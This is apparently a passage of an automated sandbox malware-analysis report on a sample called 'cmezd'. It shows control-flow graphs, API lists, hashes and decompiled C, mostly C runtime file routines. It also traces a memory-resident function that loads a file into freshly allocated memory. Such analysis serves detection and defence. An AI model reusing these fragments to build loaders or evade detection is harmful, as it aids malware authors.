                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 492 9507da-950820 call 95005f call 950073 GetSystemInfo 498 950822-950825 492->498 499 950829 492->499 500 95082b-95082e 498->500 499->500
                                                                                              APIs
                                                                                              • GetSystemInfo.KERNELBASE(?), ref: 009507F7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263303661.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_950000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoSystem
                                                                                              • String ID:
                                                                                              • API String ID: 31276548-0
                                                                                              • Opcode ID: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
                                                                                              • Instruction ID: 517965376fb8c363798169fbaf38a4a75e0bc53c197c1d2241bc3d499c8f6d0f
                                                                                              • Opcode Fuzzy Hash: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
                                                                                              • Instruction Fuzzy Hash: 68F0A771D1410CABDB08EAB98845BBE77ACDB88301F104569EF16E2181D535854483A0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01388EAC Relevance: 13.8, APIs: 9, Instructions: 273COMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              C-Code - Quality: 38%
                                                                                              			E01388EAC(void* __ecx, void* __eflags, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				void* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				intOrPtr _v40;
				signed int _v48;
				void _v52;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				void* _t122;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t162;
				intOrPtr _t178;
				void* _t188;
				signed int* _t189;
				signed int _t191;
				signed int _t196;
				signed int _t202;
				signed int _t205;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t224;
				signed int _t226;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				signed int _t238;
				signed char _t241;
				signed int _t242;
				intOrPtr _t246;
				void* _t249;
				void* _t253;
				void* _t263;
				signed int _t264;
				signed int _t267;
				signed int _t268;
				signed int _t271;
				void* _t273;
				void* _t275;
				void* _t276;
				void* _t278;
				void* _t279;
				void* _t281;
				void* _t285;

				_t263 = E01389671(__ecx,  &_v76, _a16, _a20, _a24);
				_t191 = 6;
				memcpy( &_v52, _t263, _t191 << 2);
				_t275 = _t273 + 0x1c;
				_t249 = _t263 + _t191 + _t191;
				_t264 = _t263 | 0xffffffff;
				if(_v40 != _t264) {
					_t114 = E0136FF57(_t188, _t249, _t264, __eflags);
					_t189 = _a8;
					 *_t189 = _t114;
					__eflags = _t114 - _t264;
					if(_t114 != _t264) {
						_v24 = _v24 & 0x00000000;
						_v28 = 0xc;
						_t276 = _t275 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v20 =  !(_a16 >> 7) & 1;
						_push( &_v28);
						_push(_a12);
						memcpy(_t276,  &_v52, 1 << 2);
						_t196 = 0;
						_t122 = E013894F0(); // executed
						_t253 = _t122;
						_t278 = _t276 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t253); // executed
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v52;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v52 | 0x00000040;
								}
								_v5 = _t124;
								E013700FB(_t196,  *_t189, _t253);
								_t241 = _v5 | 0x00000001;
								_v16 = _t241;
								_v52 = _t241;
								 *( *((intOrPtr*)(0x13a0da0 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) = _t241;
								_t202 =  *_t189;
								_t204 = (_t202 & 0x0000003f) * 0x38;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0x13a0da0 + (_t202 >> 6) * 4)) + 0x29 + (_t202 & 0x0000003f) * 0x38)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L22:
									_v5 = 0;
									_push( &_v5);
									_push(_a16);
									_t279 = _t278 - 0x18;
									_t205 = 6;
									_push( *_t189);
									memcpy(_t279,  &_v52, _t205 << 2);
									_t134 = E01389895(_t189, 0,  &_v52 + _t205 + _t205);
									_t242 =  *_t189;
									_t267 = _t134;
									_t281 = _t279 + 0x30;
									__eflags = _t267;
									if(_t267 == 0) {
										 *((char*)( *((intOrPtr*)(0x13a0da0 + (_t242 >> 6) * 4)) + 0x29 + (_t242 & 0x0000003f) * 0x38)) = _v5;
										 *( *((intOrPtr*)(0x13a0da0 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x13a0da0 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x13a0da0 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38)) & 0x00000001;
										__eflags = _v16 & 0x00000048;
										if((_v16 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t224 =  *_t189;
												_t226 = (_t224 & 0x0000003f) * 0x38;
												_t162 =  *((intOrPtr*)(0x13a0da0 + (_t224 >> 6) * 4));
												_t87 = _t162 + _t226 + 0x28;
												 *_t87 =  *(_t162 + _t226 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t268 = _v48;
										__eflags = (_t268 & 0xc0000000) - 0xc0000000;
										if((_t268 & 0xc0000000) != 0xc0000000) {
											L32:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L32;
											}
											CloseHandle(_v12);
											_v48 = _t268 & 0x7fffffff;
											_t214 = 6;
											_push( &_v28);
											_push(_a12);
											memcpy(_t281 - 0x18,  &_v52, _t214 << 2);
											_t246 = E013894F0();
											__eflags = _t246 - 0xffffffff;
											if(_t246 != 0xffffffff) {
												_t216 =  *_t189;
												_t218 = (_t216 & 0x0000003f) * 0x38;
												__eflags = _t218;
												 *((intOrPtr*)( *((intOrPtr*)(0x13a0da0 + (_t216 >> 6) * 4)) + _t218 + 0x18)) = _t246;
												goto L32;
											}
											E0136777A(GetLastError());
											 *( *((intOrPtr*)(0x13a0da0 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x13a0da0 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
											E0137006A( *_t189);
											L10:
											goto L2;
										}
									}
									_push(_t242);
									goto L21;
								} else {
									_t267 = E013897EB(_t204,  *_t189);
									__eflags = _t267;
									if(_t267 == 0) {
										goto L22;
									}
									_push( *_t189);
									L21:
									E0138F819();
									return _t267;
								}
							}
							_t271 = GetLastError();
							E0136777A(_t271);
							 *( *((intOrPtr*)(0x13a0da0 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x13a0da0 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
							CloseHandle(_t253);
							__eflags = _t271;
							if(_t271 == 0) {
								 *((intOrPtr*)(E013676C8())) = 0xd;
							}
							goto L2;
						}
						_t233 = _v48;
						__eflags = (_t233 & 0xc0000000) - 0xc0000000;
						if((_t233 & 0xc0000000) != 0xc0000000) {
							L9:
							_t234 =  *_t189;
							_t236 = (_t234 & 0x0000003f) * 0x38;
							_t178 =  *((intOrPtr*)(0x13a0da0 + (_t234 >> 6) * 4));
							_t33 = _t178 + _t236 + 0x28;
							 *_t33 =  *(_t178 + _t236 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							E0136777A(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t285 = _t278 - 0x18;
						_v48 = _t233 & 0x7fffffff;
						_t238 = 6;
						_push( &_v28);
						_push(_a12);
						memcpy(_t285,  &_v52, _t238 << 2);
						_t196 = 0;
						_t253 = E013894F0();
						_t278 = _t285 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(E01367721()) =  *_t184 & 0x00000000;
						 *_t189 = _t264;
						 *((intOrPtr*)(E013676C8())) = 0x18;
						goto L2;
					}
				} else {
					 *(E01367721()) =  *_t186 & 0x00000000;
					 *_a8 = _t264;
					L2:
					return  *((intOrPtr*)(E013676C8()));
				}
			}
























































                                                                                              0x01388ecf
                                                                                              0x01388ed3
                                                                                              0x01388ed4
                                                                                              0x01388ed4
                                                                                              0x01388ed4
                                                                                              0x01388ed6
                                                                                              0x01388edc
                                                                                              0x01388ef7
                                                                                              0x01388efc
                                                                                              0x01388eff
                                                                                              0x01388f01
                                                                                              0x01388f03
                                                                                              0x01388f22
                                                                                              0x01388f29
                                                                                              0x01388f30
                                                                                              0x01388f33
                                                                                              0x01388f3f
                                                                                              0x01388f42
                                                                                              0x01388f4a
                                                                                              0x01388f4b
                                                                                              0x01388f4e
                                                                                              0x01388f4e
                                                                                              0x01388f50
                                                                                              0x01388f55
                                                                                              0x01388f57
                                                                                              0x01388f5a
                                                                                              0x01388f62
                                                                                              0x01388f65
                                                                                              0x01388fd2
                                                                                              0x01388fd3
                                                                                              0x01388fd9
                                                                                              0x01388fdb
                                                                                              0x01389024
                                                                                              0x01389027
                                                                                              0x01389030
                                                                                              0x01389033
                                                                                              0x01389036
                                                                                              0x01389038
                                                                                              0x01389038
                                                                                              0x01389038
                                                                                              0x01389029
                                                                                              0x0138902c
                                                                                              0x0138902c
                                                                                              0x0138903d
                                                                                              0x01389040
                                                                                              0x0138904c
                                                                                              0x01389051
                                                                                              0x0138905d
                                                                                              0x01389067
                                                                                              0x0138906b
                                                                                              0x01389075
                                                                                              0x01389078
                                                                                              0x01389083
                                                                                              0x01389088
                                                                                              0x013890a7
                                                                                              0x013890aa
                                                                                              0x013890ae
                                                                                              0x013890af
                                                                                              0x013890b5
                                                                                              0x013890ba
                                                                                              0x013890bd
                                                                                              0x013890bf
                                                                                              0x013890c1
                                                                                              0x013890c6
                                                                                              0x013890c8
                                                                                              0x013890ca
                                                                                              0x013890cd
                                                                                              0x013890cf
                                                                                              0x013890e9
                                                                                              0x0138910d
                                                                                              0x01389111
                                                                                              0x01389115
                                                                                              0x01389117
                                                                                              0x0138911b
                                                                                              0x0138911d
                                                                                              0x01389127
                                                                                              0x0138912a
                                                                                              0x01389131
                                                                                              0x01389131
                                                                                              0x01389131
                                                                                              0x01389131
                                                                                              0x0138911b
                                                                                              0x01389136
                                                                                              0x01389142
                                                                                              0x01389144
                                                                                              0x013891cf
                                                                                              0x013891cf
                                                                                              0x00000000
                                                                                              0x0138914a
                                                                                              0x0138914a
                                                                                              0x0138914e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01389153
                                                                                              0x01389165
                                                                                              0x0138916d
                                                                                              0x01389170
                                                                                              0x01389171
                                                                                              0x01389174
                                                                                              0x0138917b
                                                                                              0x01389180
                                                                                              0x01389183
                                                                                              0x013891b7
                                                                                              0x013891c1
                                                                                              0x013891c1
                                                                                              0x013891cb
                                                                                              0x00000000
                                                                                              0x013891cb
                                                                                              0x0138918c
                                                                                              0x013891a5
                                                                                              0x013891ac
                                                                                              0x01388fcc
                                                                                              0x00000000
                                                                                              0x01388fcc
                                                                                              0x01389144
                                                                                              0x013890d1
                                                                                              0x00000000
                                                                                              0x0138908a
                                                                                              0x01389091
                                                                                              0x01389094
                                                                                              0x01389096
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01389098
                                                                                              0x0138909a
                                                                                              0x0138909a
                                                                                              0x00000000
                                                                                              0x013890a0
                                                                                              0x01389088
                                                                                              0x01388fe3
                                                                                              0x01388fe6
                                                                                              0x01389001
                                                                                              0x01389006
                                                                                              0x0138900c
                                                                                              0x0138900e
                                                                                              0x01389019
                                                                                              0x01389019
                                                                                              0x00000000
                                                                                              0x0138900e
                                                                                              0x01388f67
                                                                                              0x01388f6e
                                                                                              0x01388f70
                                                                                              0x01388fa7
                                                                                              0x01388fa7
                                                                                              0x01388fb1
                                                                                              0x01388fb4
                                                                                              0x01388fbb
                                                                                              0x01388fbb
                                                                                              0x01388fbb
                                                                                              0x01388fc7
                                                                                              0x00000000
                                                                                              0x01388fc7
                                                                                              0x01388f72
                                                                                              0x01388f76
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01388f78
                                                                                              0x01388f87
                                                                                              0x01388f8c
                                                                                              0x01388f8f
                                                                                              0x01388f90
                                                                                              0x01388f93
                                                                                              0x01388f93
                                                                                              0x01388f9a
                                                                                              0x01388f9c
                                                                                              0x01388f9f
                                                                                              0x01388fa2
                                                                                              0x01388fa5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01388f05
                                                                                              0x01388f0a
                                                                                              0x01388f0d
                                                                                              0x01388f14
                                                                                              0x00000000
                                                                                              0x01388f14
                                                                                              0x01388ede
                                                                                              0x01388ee3
                                                                                              0x01388ee9
                                                                                              0x01388eeb
                                                                                              0x00000000
                                                                                              0x01388ef0

                                                                                              APIs
                                                                                                • Part of subcall function 013894F0: CreateFileW.KERNELBASE(00000000,00000000,?,01388F55,?,?,00000000,?,01388F55,00000000,0000000C), ref: 0138950D
                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 01388FC0
                                                                                              • __dosmaperr.LIBCMT ref: 01388FC7
                                                                                              • GetFileType.KERNELBASE(00000000), ref: 01388FD3
                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 01388FDD
                                                                                              • __dosmaperr.LIBCMT ref: 01388FE6
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 01389006
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 01389153
                                                                                              • GetLastError.KERNEL32 ref: 01389185
                                                                                              • __dosmaperr.LIBCMT ref: 0138918C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                              • String ID:
                                                                                              • API String ID: 4237864984-0
                                                                                              • Opcode ID: 44525c7c0f5cbe340186fd69078ea54298d402cc1f31f3ea955780ac97318b5c
                                                                                              • Instruction ID: c0aa11f00934e931cc345cd1c9a620eda86d2a50207fdc38f075d58a0a46d1d4
                                                                                              • Opcode Fuzzy Hash: 44525c7c0f5cbe340186fd69078ea54298d402cc1f31f3ea955780ac97318b5c
                                                                                              • Instruction Fuzzy Hash: 1DA15732A142559FCF29AF6CDC95BBE3BA5AB4632CF54014DF801AF291C7359812CB81
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00950D82 Relevance: 10.7, APIs: 7, Instructions: 194filememoryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 69 950d82-950e52 call 95005f call 950073 * 7 call 950109 CreateFileW 88 950f31 69->88 89 950e58-950e63 69->89 90 950f33-950f38 88->90 89->88 94 950e69-950e79 VirtualAlloc 89->94 92 950f3e-950f43 90->92 93 950f3a 90->93 98 950f5f-950f62 92->98 93->92 94->88 95 950e7f-950e8e ReadFile 94->95 95->88 97 950e94-950eb3 VirtualAlloc 95->97 101 950eb5-950ec8 call 9500da 97->101 102 950f2d-950f2f 97->102 99 950f45-950f49 98->99 100 950f64-950f69 98->100 103 950f55-950f57 99->103 104 950f4b-950f53 99->104 105 950f76-950f7e 100->105 106 950f6b-950f73 VirtualFree 100->106 111 950f03-950f13 call 950073 101->111 112 950eca-950ed5 101->112 102->90 108 950f5e 103->108 109 950f59-950f5c 103->109 104->98 106->105 108->98 109->98 111->90 118 950f15-950f1a 111->118 114 950ed8-950f01 call 9500da 112->114 114->111 119 950f20-950f2b VirtualFree 118->119 120 950f1c-950f1d FindCloseChangeNotification 118->120 119->98 120->119
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,?,?,?,?,00951618,7FAB7E30), ref: 00950E48
                                                                                              • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,00951618,7FAB7E30,009512D6,00000000,00000040), ref: 00950E72
                                                                                              • ReadFile.KERNELBASE(00000000,00000000,0000000E,7FAB7E30,00000000,?,?,?,?,?,?,?,00951618,7FAB7E30,009512D6,00000000), ref: 00950E89
                                                                                              • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,00951618,7FAB7E30,009512D6,00000000,00000040), ref: 00950EAB
                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,00951618,7FAB7E30,009512D6,00000000,00000040,?,00000000,0000000E), ref: 00950F1D
                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,00951618,7FAB7E30,009512D6,00000000,00000040,?), ref: 00950F28
                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,00951618,7FAB7E30,009512D6,00000000,00000040,?), ref: 00950F73
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263303661.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_950000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                                                                              • String ID:
                                                                                              • API String ID: 656311269-0
                                                                                              • Opcode ID: 2750b100552033d15ea88f32999868b96fd5d6922c40ce626642daabb29e00ac
                                                                                              • Instruction ID: e5376a981fd28ee1ab6ffc752df0849f3e438afdcc873c5a41640d9c2b313303
                                                                                              • Opcode Fuzzy Hash: 2750b100552033d15ea88f32999868b96fd5d6922c40ce626642daabb29e00ac
                                                                                              • Instruction Fuzzy Hash: 89519B71E00218BBDB20DFB6CC85BAEB7B8AF88711F144555FD15F7281E6749908CB64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 013810AE Relevance: 9.3, APIs: 6, Instructions: 298COMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 121 13810ae-13810be 122 13810d8-13810da 121->122 123 13810c0-13810d3 call 1367721 call 13676c8 121->123 125 138142e-138143b call 1367721 call 13676c8 122->125 126 13810e0-13810e6 122->126 139 1381446 123->139 144 1381441 call 1364c41 125->144 126->125 129 13810ec-1381118 126->129 129->125 132 138111e-1381127 129->132 135 1381129-138113c call 1367721 call 13676c8 132->135 136 1381141-1381143 132->136 135->144 137 1381149-138114d 136->137 138 138142a-138142c 136->138 137->138 142 1381153-1381157 137->142 143 1381449-138144c 138->143 139->143 142->135 146 1381159-1381170 142->146 144->139 150 1381172-1381175 146->150 151 13811b5-13811bb 146->151 154 1381184-138118a 150->154 155 1381177-138117f 150->155 152 138118c-13811a3 call 1367721 call 13676c8 call 1364c41 151->152 153 13811bd-13811c4 151->153 189 1381361 152->189 156 13811c8-13811e6 call 1367865 call 1364b6e * 2 153->156 157 13811c6 153->157 154->152 159 13811a8-13811b3 154->159 158 1381235-1381248 155->158 193 13811e8-13811fe call 13676c8 call 1367721 156->193 194 1381203-138122b call 1381e3c 156->194 157->156 163 138124e-138125a 158->163 164 1381304-138130d call 13852cb 158->164 161 1381232 159->161 161->158 163->164 167 1381260-1381262 163->167 174 138137e 164->174 175 138130f-1381321 164->175 167->164 171 1381268-1381289 167->171 171->164 177 138128b-13812a1 171->177 182 1381382-1381398 ReadFile 174->182 175->174 179 1381323-1381332 GetConsoleMode 175->179 177->164 181 13812a3-13812a5 177->181 179->174 184 1381334-1381338 179->184 181->164 186 13812a7-13812ca 181->186 187 138139a-13813a0 182->187 188 13813f6-1381401 GetLastError 182->188 184->182 191 138133a-1381352 ReadConsoleW 184->191 186->164 195 13812cc-13812e2 186->195 187->188 190 13813a2 187->190 196 138141a-138141d 188->196 197 1381403-1381415 call 13676c8 call 1367721 188->197 192 1381364-138136e call 1364b6e 189->192 200 13813a5-13813b7 190->200 201 1381373-138137c 191->201 202 1381354 GetLastError 191->202 192->143 193->189 194->161 195->164 207 13812e4-13812e6 195->207 203 138135a-1381360 call 136777a 196->203 204 1381423-1381425 196->204 197->189 200->192 210 13813b9-13813bd 200->210 201->200 202->203 203->189 204->192 207->164 214 13812e8-13812ff 207->214 216 13813bf-13813cf call 138152a 210->216 217 13813d6-13813e3 210->217 214->164 228 13813d2-13813d4 216->228 222 13813ef-13813f4 call 13817cd 217->222 223 13813e5 call 13814af 217->223 229 13813ea-13813ed 222->229 223->229 228->192 229->228
                                                                                              C-Code - Quality: 77%
                                                                                              			E013810AE(signed int _a4, void* _a8, unsigned int _a12) {
				signed int _v5;
				signed int _v12;
				void* _v16;
				signed int _v20;
				long _v24;
				void* _v28;
				char _v32;
				void* _v36;
				long _v40;
				signed int* _t132;
				signed int _t134;
				signed int _t135;
				long _t138;
				signed int _t141;
				signed int _t143;
				signed char _t145;
				intOrPtr _t153;
				long _t155;
				signed int _t156;
				signed int _t157;
				signed int _t159;
				long _t160;
				intOrPtr _t165;
				signed int _t166;
				intOrPtr _t168;
				signed int _t170;
				signed int _t172;
				char _t174;
				char _t179;
				char _t184;
				signed char _t191;
				long _t197;
				signed int _t200;
				intOrPtr _t203;
				long _t204;
				signed int _t205;
				unsigned int _t208;
				signed int _t210;
				signed int _t216;
				signed char _t217;
				long _t218;
				long _t219;
				void* _t220;
				signed int _t221;
				char* _t223;
				char* _t224;
				char* _t225;
				signed int _t230;
				signed int _t231;
				void* _t235;
				void* _t237;
				void* _t238;
				void* _t239;

				_t200 = _a4;
				_t238 = _t237 - 0x24;
				if(_t200 != 0xfffffffe) {
					__eflags = _t200;
					if(_t200 < 0) {
						L60:
						_t132 = E01367721();
						 *_t132 =  *_t132 & 0x00000000;
						__eflags =  *_t132;
						 *((intOrPtr*)(E013676C8())) = 9;
						L61:
						_t134 = E01364C41();
						goto L62;
					}
					__eflags = _t200 -  *0x13a0fa0; // 0x40
					if(__eflags >= 0) {
						goto L60;
					}
					_t216 = _t200 >> 6;
					_t230 = (_t200 & 0x0000003f) * 0x38;
					_v12 = _t216;
					_v32 = 1;
					_t138 =  *((intOrPtr*)(0x13a0da0 + _t216 * 4));
					_v24 = _t138;
					_v20 = _t230;
					_t217 =  *((intOrPtr*)(_t138 + _t230 + 0x28));
					_v5 = _t217;
					__eflags = 1 & _t217;
					if((1 & _t217) == 0) {
						goto L60;
					}
					_t218 = _a12;
					__eflags = _t218 - 0x7fffffff;
					if(_t218 <= 0x7fffffff) {
						__eflags = _t218;
						if(_t218 == 0) {
							L59:
							_t135 = 0;
							goto L63;
						}
						__eflags = _v5 & 0x00000002;
						if((_v5 & 0x00000002) != 0) {
							goto L59;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							goto L6;
						}
						_t141 =  *((intOrPtr*)(_t138 + _t230 + 0x29));
						_v5 = _t141;
						_v28 =  *((intOrPtr*)(_t138 + _t230 + 0x18));
						_t235 = 0;
						_t143 = _t141 - 1;
						__eflags = _t143;
						if(_t143 == 0) {
							_t145 =  !_t218;
							__eflags = 1 & _t145;
							if((1 & _t145) == 0) {
								L14:
								 *(E01367721()) =  *_t146 & _t235;
								 *((intOrPtr*)(E013676C8())) = 0x16;
								E01364C41();
								goto L40;
							} else {
								_t219 = _t218 >> 1;
								_t197 = 4;
								__eflags = _t219 - 1;
								if(_t219 >= 1) {
									_t197 = _t219;
								}
								_t235 = E01367865(_t197);
								E01364B6E(0);
								E01364B6E(0);
								_t239 = _t238 + 0xc;
								_v16 = _t235;
								__eflags = _t235;
								if(_t235 != 0) {
									_t153 = E01381E3C(_t219, _a4, 0, 0, 1);
									_t238 = _t239 + 0x10;
									_t203 =  *((intOrPtr*)(0x13a0da0 + _v12 * 4));
									 *((intOrPtr*)(_t230 + _t203 + 0x20)) = _t153;
									 *(_t230 + _t203 + 0x24) = _t219;
									_t220 = _t235;
									_t155 =  *((intOrPtr*)(0x13a0da0 + _v12 * 4));
									L22:
									_v24 = _t155;
									L23:
									_t204 = _v24;
									_t230 = 0;
									_t156 = _v20;
									_v36 = _t220;
									__eflags =  *(_t156 + _t204 + 0x28) & 0x00000048;
									_t205 = _a4;
									if(( *(_t156 + _t204 + 0x28) & 0x00000048) != 0) {
										_t56 = _v24 + 0x2a; // 0x10c483c2
										_t174 =  *((intOrPtr*)(_t156 + _t56));
										_t223 = _v16;
										__eflags = _t174 - 0xa;
										if(_t174 != 0xa) {
											__eflags = _t197;
											if(_t197 != 0) {
												_t230 = 1;
												 *_t223 = _t174;
												_t224 = _t223 + 1;
												_t197 = _t197 - 1;
												__eflags = _v5;
												_v16 = _t224;
												 *((char*)(_v20 +  *((intOrPtr*)(0x13a0da0 + _v12 * 4)) + 0x2a)) = 0xa;
												_t205 = _a4;
												if(_v5 != 0) {
													_t72 =  *((intOrPtr*)(0x13a0da0 + _v12 * 4)) + 0x2b; // 0x8310c483
													_t179 =  *((intOrPtr*)(_v20 + _t72));
													_t205 = _a4;
													__eflags = _t179 - 0xa;
													if(_t179 != 0xa) {
														__eflags = _t197;
														if(_t197 != 0) {
															 *_t224 = _t179;
															_t225 = _t224 + 1;
															_t197 = _t197 - 1;
															__eflags = _v5 - 1;
															_v16 = _t225;
															_t230 = 2;
															 *((char*)(_v20 +  *((intOrPtr*)(0x13a0da0 + _v12 * 4)) + 0x2b)) = 0xa;
															_t205 = _a4;
															if(_v5 == 1) {
																_t88 =  *((intOrPtr*)(0x13a0da0 + _v12 * 4)) + 0x2c; // 0xf88310c4
																_t184 =  *((intOrPtr*)(_v20 + _t88));
																_t205 = _a4;
																__eflags = _t184 - 0xa;
																if(_t184 != 0xa) {
																	__eflags = _t197;
																	if(_t197 != 0) {
																		 *_t225 = _t184;
																		_t197 = _t197 - 1;
																		__eflags = _t197;
																		_v16 = _t225 + 1;
																		_t230 = 3;
																		 *((char*)(_v20 +  *((intOrPtr*)(0x13a0da0 + _v12 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t157 = E013852CB(_t205);
									__eflags = _t157;
									if(_t157 == 0) {
										L43:
										_v32 = 0;
										L44:
										_t198 = _v16;
										_t159 = ReadFile(_v28, _v16, _t197,  &_v24, 0); // executed
										__eflags = _t159;
										if(_t159 == 0) {
											L55:
											_t160 = GetLastError();
											_t230 = 5;
											__eflags = _t160 - _t230;
											if(_t160 != _t230) {
												__eflags = _t160 - 0x6d;
												if(_t160 != 0x6d) {
													L39:
													E0136777A(_t160);
													goto L40;
												}
												_t231 = 0;
												goto L41;
											}
											 *((intOrPtr*)(E013676C8())) = 9;
											 *(E01367721()) = _t230;
											goto L40;
										}
										_t208 = _a12;
										__eflags = _v24 - _t208;
										if(_v24 > _t208) {
											goto L55;
										}
										_t231 = _t230 + _v24;
										__eflags = _t231;
										L47:
										_t221 = _v20;
										_t165 =  *((intOrPtr*)(0x13a0da0 + _v12 * 4));
										__eflags =  *((char*)(_t221 + _t165 + 0x28));
										if( *((char*)(_t221 + _t165 + 0x28)) < 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v32;
												_push(_t231 >> 1);
												_push(_v36);
												_push(_a4);
												if(_v32 == 0) {
													_t166 = E013817CD();
												} else {
													_t166 = E013814AF();
												}
											} else {
												_t209 = _t208 >> 1;
												__eflags = _t208 >> 1;
												_t166 = E0138152A(_t208 >> 1, _t208 >> 1, _a4, _t198, _t231, _a8, _t209);
											}
											_t231 = _t166;
										}
										goto L41;
									}
									_t210 = _v20;
									_t168 =  *((intOrPtr*)(0x13a0da0 + _v12 * 4));
									__eflags =  *((char*)(_t210 + _t168 + 0x28));
									if( *((char*)(_t210 + _t168 + 0x28)) >= 0) {
										goto L43;
									}
									_t170 = GetConsoleMode(_v28,  &_v40);
									__eflags = _t170;
									if(_t170 == 0) {
										goto L43;
									}
